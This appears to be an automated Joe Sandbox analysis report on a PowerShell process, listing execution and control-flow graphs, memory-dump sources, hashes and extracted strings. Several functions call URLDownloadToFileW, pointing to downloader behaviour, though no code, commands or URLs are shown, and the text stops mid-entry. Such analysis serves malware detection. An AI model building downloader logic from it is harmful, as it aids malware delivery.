                                                                                execution_graph 9787 28c7570 9788 28c7573 9787->9788 9790 28c75fe 9788->9790 9796 28c7da8 9788->9796 9803 28c7a18 9788->9803 9811 28c7c45 9788->9811 9818 28c7824 9788->9818 9827 28c782a 9788->9827 9789 28c75df 9797 28c7cf9 9796->9797 9835 7124610 9797->9835 9845 71245f5 9797->9845 9798 28c7d57 URLDownloadToFileW 9800 28c7ea8 9798->9800 9800->9789 9805 28c7a4c 9803->9805 9804 28c7d57 URLDownloadToFileW 9808 28c7ea8 9804->9808 9805->9804 9807 28c7b30 9805->9807 9809 7124610 5 API calls 9805->9809 9810 71245f5 5 API calls 9805->9810 9807->9789 9808->9789 9809->9804 9810->9804 9814 28c7b9a 9811->9814 9813 28c7ea8 9813->9789 9815 28c7d57 URLDownloadToFileW 9814->9815 9816 7124610 5 API calls 9814->9816 9817 71245f5 5 API calls 9814->9817 9815->9813 9816->9815 9817->9815 9819 28c782a 5 API calls 9818->9819 9820 28c7829 9819->9820 9821 28c7b30 9820->9821 9824 28c7d57 URLDownloadToFileW 9820->9824 9825 7124610 5 API calls 9820->9825 9826 71245f5 5 API calls 9820->9826 9821->9789 9823 28c7ea8 9823->9789 9824->9823 9825->9824 9826->9824 9831 28c7a18 9827->9831 9828 28c7b30 9828->9789 9830 28c7ea8 9830->9789 9831->9828 9832 28c7d57 URLDownloadToFileW 9831->9832 9833 7124610 5 API calls 9831->9833 9834 71245f5 5 API calls 9831->9834 9832->9830 9833->9832 9834->9832 9836 7124641 9835->9836 9837 7124a93 9835->9837 9836->9837 9839 28c7a18 6 API calls 9836->9839 9841 28c7da8 6 API calls 9836->9841 9842 28c782a 6 API calls 9836->9842 9843 28c7824 6 API calls 9836->9843 9844 28c7c45 6 API calls 9836->9844 9855 28c1bf8 9836->9855 9837->9798 9838 7124a34 9838->9798 9839->9838 9841->9838 9842->9838 9843->9838 9844->9838 9847 712460b 9845->9847 9846 7124a93 9846->9798 9847->9846 9849 28c7a18 6 API calls 9847->9849 9850 28c1bf8 URLDownloadToFileW 9847->9850 9851 28c7da8 6 API calls 9847->9851 9852 28c782a 6 API calls 9847->9852 9853 28c7824 6 API calls 9847->9853 9854 28c7c45 6 API calls 9847->9854 9848 7124a34 9848->9798 9849->9848 9850->9848 9851->9848 9852->9848 9853->9848 9854->9848 9856 28c7e00 URLDownloadToFileW 9855->9856 9858 28c7ea8 9856->9858 9858->9838

                                                                                Executed Functions

                                                                                Function 028C7A18 Relevance: 1.9, APIs: 1, Instructions: 355COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 337 28c7a18-28c7a4a 338 28c7a4c-28c7a53 337->338 339 28c7a90 337->339 341 28c7a64 338->341 342 28c7a55-28c7a62 338->342 340 28c7a93-28c7acf 339->340 351 28c7b58-28c7b63 340->351 352 28c7ad5-28c7ade 340->352 343 28c7a66-28c7a68 341->343 342->343 344 28c7a6f-28c7a71 343->344 345 28c7a6a-28c7a6d 343->345 349 28c7a82 344->349 350 28c7a73-28c7a80 344->350 348 28c7a8e 345->348 348->340 354 28c7a84-28c7a86 349->354 350->354 355 28c7b65-28c7b68 351->355 356 28c7b72-28c7b94 351->356 352->351 353 28c7ae0-28c7ae6 352->353 357 28c7aec-28c7af9 353->357 358 28c7de8-28c7e52 353->358 354->348 355->356 363 28c7c5e-28c7d52 356->363 364 28c7b9a-28c7ba3 356->364 360 28c7b4f-28c7b56 357->360 361 28c7afb-28c7b2e 357->361 373 28c7e5d-28c7e63 358->373 374 28c7e54-28c7e5a 358->374 360->351 360->353 375 28c7b4b 361->375 376 28c7b30-28c7b33 361->376 412 28c7d55 call 7124610 363->412 413 28c7d55 call 71245f5 363->413 364->358 367 28c7ba9-28c7be7 364->367 386 28c7be9-28c7bff 367->386 387 28c7c01-28c7c14 367->387 378 28c7e65-28c7e6e 373->378 379 28c7e71-28c7ea6 URLDownloadToFileW 373->379 374->373 375->360 380 28c7b3f-28c7b48 376->380 381 28c7b35-28c7b38 376->381 378->379 383 28c7eaf-28c7ec3 379->383 384 28c7ea8-28c7eae 379->384 381->380 384->383 388 28c7c16-28c7c1d 386->388 387->388 391 28c7c1f-28c7c30 388->391 392 28c7c42 388->392 391->392 395 28c7c32-28c7c3b 391->395 392->363 395->392 406 28c7d57-28c7d60 407 28c7d7a-28c7d8d 406->407 408 28c7d62-28c7d78 406->408 409 28c7d8f-28c7d96 407->409 408->409 410 28c7d98-28c7d9e 409->410 411 28c7da5 409->411 410->411 411->358 412->406 413->406
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1814443013.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_28c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5cdc246ff05193bbb1b53b0e60d423393bd149c8c13024dc2aa0aa78d65712ca
                                                                                • Instruction ID: 485cd0f7161a4ccfc690e0cf4546cf5c9bdd65687740ba13f02365a76b2fb573
                                                                                • Opcode Fuzzy Hash: 5cdc246ff05193bbb1b53b0e60d423393bd149c8c13024dc2aa0aa78d65712ca
                                                                                • Instruction Fuzzy Hash: 1FE1FA79A00219EFDB05CF98D584A9EFBB6FF48314F248159E808AB365C731E995CF90
                                                                                Function 07121F40 Relevance: 5.6, Strings: 4, Instructions: 572COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 7121f40-7121f65 1 7121f6b-7121f70 0->1 2 7122158-71221a2 0->2 3 7121f72-7121f78 1->3 4 7121f88-7121f8c 1->4 19 7122326-712236a 2->19 20 71221a8-71221ad 2->20 5 7121f7a 3->5 6 7121f7c-7121f86 3->6 7 7121f92-7121f94 4->7 8 7122108-7122112 4->8 5->4 6->4 12 7121f96-7121fa2 7->12 13 7121fa4 7->13 10 7122120-7122126 8->10 11 7122114-712211d 8->11 14 7122128-712212a 10->14 15 712212c-7122138 10->15 17 7121fa6-7121fa8 12->17 13->17 21 712213a-7122155 14->21 15->21 17->8 22 7121fae-7121fcd 17->22 33 7122480-71224b5 19->33 34 7122370-7122375 19->34 23 71221c5-71221c9 20->23 24 71221af-71221b5 20->24 47 7121fcf-7121fdb 22->47 48 7121fdd 22->48 29 71222d8-71222e2 23->29 30 71221cf-71221d1 23->30 26 71221b7 24->26 27 71221b9-71221c3 24->27 26->23 27->23 35 71222e4-71222ec 29->35 36 71222ef-71222f5 29->36 37 71221d3-71221df 30->37 38 71221e1 30->38 62 71224e3-71224ed 33->62 63 71224b7-71224d9 33->63 41 7122377-712237d 34->41 42 712238d-7122391 34->42 44 71222f7-71222f9 36->44 45 71222fb-7122307 36->45 43 71221e3-71221e5 37->43 38->43 49 7122381-712238b 41->49 50 712237f 41->50 53 7122432-712243c 42->53 54 7122397-7122399 42->54 43->29 51 71221eb-712220a 43->51 52 7122309-7122323 44->52 45->52 58 7121fdf-7121fe1 47->58 48->58 49->42 50->42 87 712221a 51->87 88 712220c-7122218 51->88 56 7122449-712244f 53->56 57 712243e-7122446 53->57 60 712239b-71223a7 54->60 61 71223a9 54->61 66 7122451-7122453 56->66 67 7122455-7122461 56->67 58->8 68 7121fe7-7121fee 58->68 64 71223ab-71223ad 60->64 61->64 69 71224f7-71224fd 62->69 70 71224ef-71224f4 62->70 98 71224db-71224e0 63->98 99 712252d-7122556 63->99 64->53 74 71223b3-71223b5 64->74 75 7122463-712247d 66->75 67->75 68->2 76 7121ff4-7121ff9 68->76 77 7122503-712250f 69->77 78 71224ff-7122501 69->78 79 71223b7-71223bd 74->79 80 71223cf-71223d6 74->80 83 7122011-7122020 76->83 84 7121ffb-7122001 76->84 85 7122511-712252a 77->85 78->85 90 71223c1-71223cd 79->90 91 71223bf 79->91 94 71223d8-71223de 80->94 95 71223ee-712242f 80->95 83->8 110 7122026-7122044 83->110 92 7122003 84->92 93 7122005-712200f 84->93 104 712221c-712221e 87->104 88->104 90->80 91->80 92->83 93->83 100 71223e2-71223ec 94->100 101 71223e0 94->101 117 7122585-71225b4 99->117 118 7122558-712257e 99->118 100->95 101->95 104->29 106 7122224-712225b 104->106 126 7122275-712227c 106->126 127 712225d-7122263 106->127 110->8 121 712204a-712206f 110->121 128 71225b6-71225d3 117->128 129 71225ed-71225f7 117->129 118->117 121->8 146 7122075-712207c 121->146 130 7122294-71222d5 126->130 131 712227e-7122284 126->131 135 7122267-7122273 127->135 136 7122265 127->136 144 71225d5-71225e7 128->144 145 712263d-7122642 128->145 132 7122600-7122606 129->132 133 71225f9-71225fd 129->133 138 7122286 131->138 139 7122288-7122292 131->139 142 7122608-712260a 132->142 143 712260c-7122618 132->143 135->126 136->126 138->130 139->130 147 712261a-712263a 142->147 143->147 144->129 145->144 150 71220c2-71220f5 146->150 151 712207e-7122099 146->151 165 71220fc-7122105 150->165 157 71220b3-71220b7 151->157 158 712209b-71220a1 151->158 163 71220be-71220c0 157->163 161 71220a3 158->161 162 71220a5-71220b1 158->162 161->157 162->157 163->165
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-1420252700
                                                                                • Opcode ID: e8cda80fdfe76ced4fcd342a0418cd92b8334ede88b4f48bacc5fcfab42745f4
                                                                                • Instruction ID: 69a5a878646a9c4214e63cba98e1fe84e5b67604ec4cbbdfd9db73d5e12af2e2
                                                                                • Opcode Fuzzy Hash: e8cda80fdfe76ced4fcd342a0418cd92b8334ede88b4f48bacc5fcfab42745f4
                                                                                • Instruction Fuzzy Hash: B8125BB17043658FCB168B688800B6EBFA1BFD5210F1580AAD905CF2D5DB31C9A7D7A2
                                                                                Function 07124610 Relevance: 2.9, Strings: 2, Instructions: 439COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 170 7124610-712463b 171 7124af2-7124b25 170->171 172 7124641-7124646 170->172 185 7124b27-7124b33 171->185 186 7124b35 171->186 173 7124648-712464e 172->173 174 712465e-7124663 172->174 175 7124652-712465c 173->175 176 7124650 173->176 178 7124673 174->178 179 7124665-7124671 174->179 175->174 176->174 180 7124675-7124677 178->180 179->180 183 7124a93-7124a9d 180->183 184 712467d-7124687 180->184 187 7124aab-7124ab1 183->187 188 7124a9f-7124aa8 183->188 184->171 189 712468d-7124692 184->189 190 7124b37-7124b39 185->190 186->190 191 7124ab3-7124ab5 187->191 192 7124ab7-7124ac3 187->192 193 7124694-712469a 189->193 194 71246aa-71246b8 189->194 195 7124b7b-7124b85 190->195 196 7124b3b-7124b42 190->196 197 7124ac5-7124aef 191->197 192->197 198 712469e-71246a8 193->198 199 712469c 193->199 194->183 205 71246be-71246dd 194->205 201 7124b87-7124b8b 195->201 202 7124b8e-7124b94 195->202 196->195 203 7124b44-7124b61 196->203 198->194 199->194 206 7124b96-7124b98 202->206 207 7124b9a-7124ba6 202->207 215 7124b63-7124b75 203->215 216 7124bc9-7124bce 203->216 205->183 220 71246e3-71246ed 205->220 210 7124ba8-7124bc6 206->210 207->210 215->195 216->215 220->171 222 71246f3-71246f8 220->222 223 7124710-7124714 222->223 224 71246fa-7124700 222->224 223->183 227 712471a-712471e 223->227 225 7124702 224->225 226 7124704-712470e 224->226 225->223 226->223 227->183 228 7124724-7124728 227->228 228->183 229 712472e-712473e 228->229 231 71247c6-7124815 229->231 232 7124744-712476b 229->232 249 712481c-712482f 231->249 237 7124785-71247b3 232->237 238 712476d-7124773 232->238 246 71247c1-71247c4 237->246 247 71247b5-71247b7 237->247 239 7124777-7124783 238->239 240 7124775 238->240 239->237 240->237 246->249 247->246 250 71248b7-7124906 249->250 251 7124835-712485c 249->251 268 712490d-7124920 250->268 256 7124876-71248a4 251->256 257 712485e-7124864 251->257 265 71248b2-71248b5 256->265 266 71248a6-71248a8 256->266 258 7124866 257->258 259 7124868-7124874 257->259 258->256 259->256 265->268 266->265 269 7124926-712494d 268->269 270 71249a8-71249f7 268->270 275 7124967-7124995 269->275 276 712494f-7124955 269->276 287 71249fe-7124a2c 270->287 285 71249a3-71249a6 275->285 286 7124997-7124999 275->286 277 7124957 276->277 278 7124959-7124965 276->278 277->275 278->275 285->287 286->285 292 7124a2f call 28c7a18 287->292 293 7124a2f call 28c1bf8 287->293 294 7124a2f call 28c7da8 287->294 295 7124a2f call 28c782a 287->295 296 7124a2f call 28c7824 287->296 297 7124a2f call 28c7c45 287->297 290 7124a34-7124a90 292->290 293->290 294->290 295->290 296->290 297->290
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 558d5b2237cba048f15d24093ce6ac10bc7a615790aa9371d4eb45614441c896
                                                                                • Instruction ID: ee4c5126f423776eb9a5731b19c02df731c3fb909add3a985d01740c411c7d17
                                                                                • Opcode Fuzzy Hash: 558d5b2237cba048f15d24093ce6ac10bc7a615790aa9371d4eb45614441c896
                                                                                • Instruction Fuzzy Hash: 71F11374B003699FCB159F68C404B6ABBA2EFC8720F248469ED059B390DB72DC56CB91
                                                                                Function 071204F8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 298 71204f8-712050a 299 7120510-7120521 298->299 300 71205ca-71205fd 298->300 303 7120523-7120529 299->303 304 712053b-7120558 299->304 305 712066b-7120675 300->305 306 71205ff-712063e 300->306 307 712052b 303->307 308 712052d-7120539 303->308 304->300 317 712055a-712057c 304->317 309 7120680-7120686 305->309 310 7120677-712067d 305->310 327 7120640-712064e 306->327 328 71206bb-71206c0 306->328 307->304 308->304 311 7120688-712068a 309->311 312 712068c-7120698 309->312 316 712069a-71206b8 311->316 312->316 322 7120596-71205ae 317->322 323 712057e-7120584 317->323 333 71205b0-71205b2 322->333 334 71205bc-71205c7 322->334 325 7120586 323->325 326 7120588-7120594 323->326 325->322 326->322 336 7120656-7120665 327->336 328->327 333->334 336->305
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q$tP^q
                                                                                • API String ID: 0-309238000
                                                                                • Opcode ID: 692b242f455e2ae8c965dff596592432e0966a18e7765a35e2c036dfdf5097fd
                                                                                • Instruction ID: 5fe4eadaa365db36e1cce446afab15a04138e67fd93aec9429b46dc3f930e879
                                                                                • Opcode Fuzzy Hash: 692b242f455e2ae8c965dff596592432e0966a18e7765a35e2c036dfdf5097fd
                                                                                • Instruction Fuzzy Hash: 995157B1B043289FD7159B688814B2ABFE2AFC9710F14855AE949DF3C1CA31DC5AC7E1
                                                                                Function 028C1BF8 Relevance: 1.6, APIs: 1, Instructions: 68filenetworkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 414 28c1bf8-28c7e52 417 28c7e5d-28c7e63 414->417 418 28c7e54-28c7e5a 414->418 419 28c7e65-28c7e6e 417->419 420 28c7e71-28c7ea6 URLDownloadToFileW 417->420 418->417 419->420 421 28c7eaf-28c7ec3 420->421 422 28c7ea8-28c7eae 420->422 422->421
                                                                                APIs
                                                                                • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 028C7E99
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1814443013.00000000028C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_28c0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: DownloadFile
                                                                                • String ID:
                                                                                • API String ID: 1407266417-0
                                                                                • Opcode ID: c625e35586ae72468639a8817c0430babbcf0b1139098daadbf22adcb954eaa8
                                                                                • Instruction ID: dd033aee65a5a8f82b62fd1e33de8ce8da8cb439188ee897adf137e904c672d8
                                                                                • Opcode Fuzzy Hash: c625e35586ae72468639a8817c0430babbcf0b1139098daadbf22adcb954eaa8
                                                                                • Instruction Fuzzy Hash: A0212BBAD01259DFCB00CF99D984BDEFBB4FB48710F208129E918A7210D375A954CFA4
                                                                                Function 071245F5 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 424 71245f5-712463b 427 7124af2-7124b25 424->427 428 7124641-7124646 424->428 441 7124b27-7124b33 427->441 442 7124b35 427->442 429 7124648-712464e 428->429 430 712465e-7124663 428->430 431 7124652-712465c 429->431 432 7124650 429->432 434 7124673 430->434 435 7124665-7124671 430->435 431->430 432->430 436 7124675-7124677 434->436 435->436 439 7124a93-7124a9d 436->439 440 712467d-7124687 436->440 443 7124aab-7124ab1 439->443 444 7124a9f-7124aa8 439->444 440->427 445 712468d-7124692 440->445 446 7124b37-7124b39 441->446 442->446 447 7124ab3-7124ab5 443->447 448 7124ab7-7124ac3 443->448 449 7124694-712469a 445->449 450 71246aa-71246b8 445->450 451 7124b7b-7124b85 446->451 452 7124b3b-7124b42 446->452 453 7124ac5-7124aef 447->453 448->453 454 712469e-71246a8 449->454 455 712469c 449->455 450->439 461 71246be-71246dd 450->461 457 7124b87-7124b8b 451->457 458 7124b8e-7124b94 451->458 452->451 459 7124b44-7124b61 452->459 454->450 455->450 462 7124b96-7124b98 458->462 463 7124b9a-7124ba6 458->463 471 7124b63-7124b75 459->471 472 7124bc9-7124bce 459->472 461->439 476 71246e3-71246ed 461->476 466 7124ba8-7124bc6 462->466 463->466 471->451 472->471 476->427 478 71246f3-71246f8 476->478 479 7124710-7124714 478->479 480 71246fa-7124700 478->480 479->439 483 712471a-712471e 479->483 481 7124702 480->481 482 7124704-712470e 480->482 481->479 482->479 483->439 484 7124724-7124728 483->484 484->439 485 712472e-712473e 484->485 487 71247c6-7124815 485->487 488 7124744-712476b 485->488 505 712481c-712482f 487->505 493 7124785-71247b3 488->493 494 712476d-7124773 488->494 502 71247c1-71247c4 493->502 503 71247b5-71247b7 493->503 495 7124777-7124783 494->495 496 7124775 494->496 495->493 496->493 502->505 503->502 506 71248b7-7124906 505->506 507 7124835-712485c 505->507 524 712490d-7124920 506->524 512 7124876-71248a4 507->512 513 712485e-7124864 507->513 521 71248b2-71248b5 512->521 522 71248a6-71248a8 512->522 514 7124866 513->514 515 7124868-7124874 513->515 514->512 515->512 521->524 522->521 525 7124926-712494d 524->525 526 71249a8-71249f7 524->526 531 7124967-7124995 525->531 532 712494f-7124955 525->532 543 71249fe-7124a2c 526->543 541 71249a3-71249a6 531->541 542 7124997-7124999 531->542 533 7124957 532->533 534 7124959-7124965 532->534 533->531 534->531 541->543 542->541 548 7124a2f call 28c7a18 543->548 549 7124a2f call 28c1bf8 543->549 550 7124a2f call 28c7da8 543->550 551 7124a2f call 28c782a 543->551 552 7124a2f call 28c7824 543->552 553 7124a2f call 28c7c45 543->553 546 7124a34-7124a90 548->546 549->546 550->546 551->546 552->546 553->546
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: tP^q
                                                                                • API String ID: 0-2862610199
                                                                                • Opcode ID: 243769ddae491d0d7953e704d53bef845f2a2d98bb5681b0be5f7d94c2ca203e
                                                                                • Instruction ID: 28a0e7233669c0d881b25cac7da16b6292068c621a01a1a97eafcd7a71b42a33
                                                                                • Opcode Fuzzy Hash: 243769ddae491d0d7953e704d53bef845f2a2d98bb5681b0be5f7d94c2ca203e
                                                                                • Instruction Fuzzy Hash: 409102B4A003A59FCB19CF58C444B69BBA2FF88710F258469EC159B3D0DB71DC56DB90
                                                                                Function 07121F25 Relevance: .1, Instructions: 123COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 791 7121f25-7121f65 794 7121f6b-7121f70 791->794 795 7122158-71221a2 791->795 796 7121f72-7121f78 794->796 797 7121f88-7121f8c 794->797 812 7122326-712236a 795->812 813 71221a8-71221ad 795->813 798 7121f7a 796->798 799 7121f7c-7121f86 796->799 800 7121f92-7121f94 797->800 801 7122108-7122112 797->801 798->797 799->797 805 7121f96-7121fa2 800->805 806 7121fa4 800->806 803 7122120-7122126 801->803 804 7122114-712211d 801->804 807 7122128-712212a 803->807 808 712212c-7122138 803->808 810 7121fa6-7121fa8 805->810 806->810 814 712213a-7122155 807->814 808->814 810->801 815 7121fae-7121fcd 810->815 826 7122480-71224b5 812->826 827 7122370-7122375 812->827 816 71221c5-71221c9 813->816 817 71221af-71221b5 813->817 840 7121fcf-7121fdb 815->840 841 7121fdd 815->841 822 71222d8-71222e2 816->822 823 71221cf-71221d1 816->823 819 71221b7 817->819 820 71221b9-71221c3 817->820 819->816 820->816 828 71222e4-71222ec 822->828 829 71222ef-71222f5 822->829 830 71221d3-71221df 823->830 831 71221e1 823->831 855 71224e3-71224ed 826->855 856 71224b7-71224d9 826->856 834 7122377-712237d 827->834 835 712238d-7122391 827->835 837 71222f7-71222f9 829->837 838 71222fb-7122307 829->838 836 71221e3-71221e5 830->836 831->836 842 7122381-712238b 834->842 843 712237f 834->843 846 7122432-712243c 835->846 847 7122397-7122399 835->847 836->822 844 71221eb-712220a 836->844 845 7122309-7122323 837->845 838->845 851 7121fdf-7121fe1 840->851 841->851 842->835 843->835 880 712221a 844->880 881 712220c-7122218 844->881 849 7122449-712244f 846->849 850 712243e-7122446 846->850 853 712239b-71223a7 847->853 854 71223a9 847->854 859 7122451-7122453 849->859 860 7122455-7122461 849->860 851->801 861 7121fe7-7121fee 851->861 857 71223ab-71223ad 853->857 854->857 862 71224f7-71224fd 855->862 863 71224ef-71224f4 855->863 891 71224db-71224e0 856->891 892 712252d-7122556 856->892 857->846 867 71223b3-71223b5 857->867 868 7122463-712247d 859->868 860->868 861->795 869 7121ff4-7121ff9 861->869 870 7122503-712250f 862->870 871 71224ff-7122501 862->871 872 71223b7-71223bd 867->872 873 71223cf-71223d6 867->873 876 7122011-7122020 869->876 877 7121ffb-7122001 869->877 878 7122511-712252a 870->878 871->878 883 71223c1-71223cd 872->883 884 71223bf 872->884 887 71223d8-71223de 873->887 888 71223ee-712242f 873->888 876->801 903 7122026-7122044 876->903 885 7122003 877->885 886 7122005-712200f 877->886 897 712221c-712221e 880->897 881->897 883->873 884->873 885->876 886->876 893 71223e2-71223ec 887->893 894 71223e0 887->894 910 7122585-71225b4 892->910 911 7122558-712257e 892->911 893->888 894->888 897->822 899 7122224-712225b 897->899 919 7122275-712227c 899->919 920 712225d-7122263 899->920 903->801 914 712204a-712206f 903->914 921 71225b6-71225d3 910->921 922 71225ed-71225f7 910->922 911->910 914->801 939 7122075-712207c 914->939 923 7122294-71222d5 919->923 924 712227e-7122284 919->924 928 7122267-7122273 920->928 929 7122265 920->929 937 71225d5-71225e7 921->937 938 712263d-7122642 921->938 925 7122600-7122606 922->925 926 71225f9-71225fd 922->926 931 7122286 924->931 932 7122288-7122292 924->932 935 7122608-712260a 925->935 936 712260c-7122618 925->936 928->919 929->919 931->923 932->923 940 712261a-712263a 935->940 936->940 937->922 938->937 943 71220c2-71220f5 939->943 944 712207e-7122099 939->944 958 71220fc-7122105 943->958 950 71220b3-71220b7 944->950 951 712209b-71220a1 944->951 956 71220be-71220c0 950->956 954 71220a3 951->954 955 71220a5-71220b1 951->955 954->950 955->950 956->958
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1f8dc84579ee91c5120e89415ded4c5ffb1246edcfd34a2dabd34795b5156351
                                                                                • Instruction ID: 5f62aeed1cdff52575fe77dea4ce857a610dfd180aa0c897f69ad2adc2891268
                                                                                • Opcode Fuzzy Hash: 1f8dc84579ee91c5120e89415ded4c5ffb1246edcfd34a2dabd34795b5156351
                                                                                • Instruction Fuzzy Hash: F14108B0B043169FDB25CF188C40A6E7BA1BF85210F5B80A5DA01DF2D1D735D9A7EB62
                                                                                Function 0285D01D Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1813804919.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_285d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e051724d1450809c73fcf6f29c5d35ff6e8fe307db7809cf14aab82f71e3faac
                                                                                • Instruction ID: 0a8ff6c551977d141df3fa262be8d024efcd177b0b0fe00bab4a5590dd23ba21
                                                                                • Opcode Fuzzy Hash: e051724d1450809c73fcf6f29c5d35ff6e8fe307db7809cf14aab82f71e3faac
                                                                                • Instruction Fuzzy Hash: B90126394083549AE7108E2ACDC4B67BFD8EF45328F08C42AEC4C8F246C379D846C6B1
                                                                                Function 0285D005 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1813804919.000000000285D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0285D000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_285d000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 04192ad054fb149e050268bf55440589ae2ab3617d893d4dba495ab6773bb61f
                                                                                • Instruction ID: 9646ef393ca436111f83c92eb887d229e7d22f1df204f3f71ebc6de9e65da43c
                                                                                • Opcode Fuzzy Hash: 04192ad054fb149e050268bf55440589ae2ab3617d893d4dba495ab6773bb61f
                                                                                • Instruction Fuzzy Hash: 5A014C6540E3C09ED7128B258D94B52BFB4EF53224F18C1DBDC888F293C2699849C772

                                                                                Non-executed Functions

                                                                                Function 071215A8 Relevance: 9.2, Strings: 7, Instructions: 483COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                • API String ID: 0-1608119003
                                                                                • Opcode ID: 145217e351896301d2ca9d084be7fe5a36f607e3450d033255a8e99d283f9f7a
                                                                                • Instruction ID: 09dc241407a5cca24a34a506828aa920394da4c015dbd928125c4ae09f4ce274
                                                                                • Opcode Fuzzy Hash: 145217e351896301d2ca9d084be7fe5a36f607e3450d033255a8e99d283f9f7a
                                                                                • Instruction Fuzzy Hash: B4F139B1B002699FCB15DB6894006ABBBF6AFC5210F1484AAD506CF2D1DB31C967E791
                                                                                Function 07123D30 Relevance: 5.2, Strings: 4, Instructions: 247COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.1822533847.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7120000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                • API String ID: 0-1420252700
                                                                                • Opcode ID: b608474bb940af3b72b038da3d42d6c42c990e4e3ccf3bdc773c89a350b62860
                                                                                • Instruction ID: 8b7e36f5a5ae43b4296cdc21b380d4ef55e8eb48358af544ab3b6e619c1988fa
                                                                                • Opcode Fuzzy Hash: b608474bb940af3b72b038da3d42d6c42c990e4e3ccf3bdc773c89a350b62860
                                                                                • Instruction Fuzzy Hash: E6815DB0B04369DFCB1A9B68D40466ABFF1EF85210F1484ABD425CB2D1DB35C86AD792
                                                                                Function 07123550 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
